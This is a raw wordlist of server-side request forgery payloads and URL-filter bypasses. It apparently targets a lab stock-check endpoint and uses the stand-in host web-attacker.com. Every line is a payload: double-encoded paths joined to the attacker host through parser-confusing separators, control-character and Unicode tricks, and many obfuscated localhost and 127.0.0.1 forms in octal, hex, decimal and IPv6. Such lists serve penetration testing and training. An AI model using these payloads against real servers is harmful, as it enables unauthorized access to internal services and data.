\\web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1 &%40web-attacker.com# %40web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1;.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1:%40web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1:443:\%40%40web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1:443\%40web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1:443#\%40web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1:anything%40web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1?%40web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.%5F.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.-.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.%2C.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.;.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.%21.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.%27.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.".web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.%28.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.%29.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.{.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.}.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.*.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.&.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.`.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.+.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.=.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.%7E.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.%24.web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1%5B%40web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1%40web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1\;%40web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1&anything%40web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1#web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1%2523web-attacker.com
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1web-attacker.com
web-attacker.com%09%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com%0A%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com%0D%0A%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com%0D%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com%E2%80%A8%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com%E2%80%A9%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com %40%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com &%40%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com %252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com;https://%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com:\%40%40%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
0://web-attacker.com:80;http://%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1:80/
web-attacker.com?%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com?%00%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com?=.%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com?=%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com?http://%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com?https://%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com..
http://web-attacker.com.%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com.%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com%EF%BC%8E%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com%40%40%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com%40%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com/?d=%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com/.%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com///%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com/%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com\.%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com\%40%40%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com\%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com\anything%40%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com%EF%BC%86%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com%EF%B9%A0%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com#%40%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com#\%40%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com#%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com#%00%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com%250d%250a%40%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com%2523%40%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com%252e%40%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com%252f%40%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com%253a443.%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com%25ff%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com+%40%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com+&%40%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
web-attacker.com%00%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
http://anything%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
anything%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
foo%40web-attacker.com %40%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
foo%40web-attacker.com:443%40%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1
http://localhost.web-attacker.com/
localhost.web-attacker.com/
http://s%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1/
%09web-attacker.com
%0Aweb-attacker.com
%0D%0A//web-attacker.com
%0D%0A\\web-attacker.com
%40web-attacker.com
http:%40web-attacker.com
https:%40web-attacker.com
///web-attacker.com
//web-attacker.com
/\web-attacker.com
/&bsol;/web-attacker.com
/&NewLine;/web-attacker.com
/&sol;/web-attacker.com
/&Tab;/web-attacker.com
\%09\web-attacker.com
\%0A\web-attacker.com
\/\/web-attacker.com
\/web-attacker.com
http:\\web-attacker.com\
#web-attacker.com
http:web-attacker.com
https:web-attacker.com
%00http://web-attacker.com
%01http://web-attacker.com
%02http://web-attacker.com
%03http://web-attacker.com
%04http://web-attacker.com
%05http://web-attacker.com
%06http://web-attacker.com
%07http://web-attacker.com
%08http://web-attacker.com
%09http://web-attacker.com
%0Ahttp://web-attacker.com
%0Bhttp://web-attacker.com
%0Chttp://web-attacker.com
%0Dhttp://web-attacker.com
%0Ehttp://web-attacker.com
%0Fhttp://web-attacker.com
%10http://web-attacker.com
%11http://web-attacker.com
%12http://web-attacker.com
%13http://web-attacker.com
%14http://web-attacker.com
%15http://web-attacker.com
%16http://web-attacker.com
%17http://web-attacker.com
%18http://web-attacker.com
%19http://web-attacker.com
%1Ahttp://web-attacker.com
%1Bhttp://web-attacker.com
%1Chttp://web-attacker.com
%1Dhttp://web-attacker.com
%1Ehttp://web-attacker.com
%1Fhttp://web-attacker.com
 http://web-attacker.com
h%09ttp://web-attacker.com
h%0Attp://web-attacker.com
h%0Dttp://web-attacker.com
http%09://web-attacker.com
http%0A://web-attacker.com
http%0D://web-attacker.com
%09http%09://web-attacker.com
%0Ahttp%0A://web-attacker.com
%0Dhttp%0D://web-attacker.com
http:/\web-attacker.com
http:/\\web-attacker.com
http:\\web-attacker.com
http:\web-attacker.com
http:/web-attacker.com
http:/0/web-attacker.com
%E2%80%8Bweb-attacker.com
%E2%81%A0web-attacker.com
%C2%ADweb-attacker.com
%5B::%5D
%5B::1%5D
%5B::ffff:0.0.0.0%5D
%5B::ffff:0000:0000%5D
%5B::ffff:7f00:1%5D
%5B::%EF%AC%80%EF%AC%80:7f00:1%5D
%5B0:0:0:0:0:ffff:127.0.0.1%5D
%5B0:0:0:0:0:ffff:1%E3%89%97.0.0.1%5D
%5B0:0:0:0:0:ffff:%E2%91%AB7.0.0.1%5D
%5B0:0:0:0:0:%EF%AC%80%EF%AC%80:127.0.0.1%5D
%5B0000::1%5D
%5B0000:0000:0000:0000:0000:0000:0000:0000%5D
%5B0000:0000:0000:0000:0000:0000:0000:0001%5D
%400
\l\o\c\a\l\h\o\s\t
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.local
%252Fproduct%252Fstock%252Fcheck%253FproductId%253D1%2526storeId%253D1.localhost
0
0:80
0.0.0.0
0000.0000.0000.0000
00000177.00000000.00000000.00000001
0177.0000.0000.0001
017700000001
0%E2%91%B0700000001
0x00000000
0x100000000
0x17f000001
0x17f000002
0x7F.0.0000.00000001
0x7F.0.0000.0001
0x7f.0x00.0x00.0x01
0x7f.0x00.0x00.0x02
0x7F.1
0x7f000001
0x7f000002
127.0.0.1
1%E3%89%97.0.0.1
%E2%91%AB7.0.0.1
127.0.0.2
1%E3%89%97.0.0.2
%E2%91%AB7.0.0.2
127.000000000000000.1
127.1
2130706433
21307064%E3%89%9D
2130706%E3%8A%B83
21%E3%89%9A706433
2%E2%91%AC0706433
%E3%89%9130706433
%E3%89%91%E3%89%9A%E2%91%A6%E2%93%AA%E2%91%A5%E2%91%A3%E3%89%9D
45080379393
localhost
%C2%ADlocalhost
%CD%8Flocalhost
%E1%A0%8Blocalhost
%E1%A0%8Clocalhost
%E1%A0%8Dlocalhost
%E1%A0%8Elocalhost
%E1%A0%8Flocalhost
%E2%80%8Blocalhost
%E2%81%A0localhost
%E2%81%A4localhost
localho%EF%AC%86
lo%E3%8E%88host
localho%EF%AC%85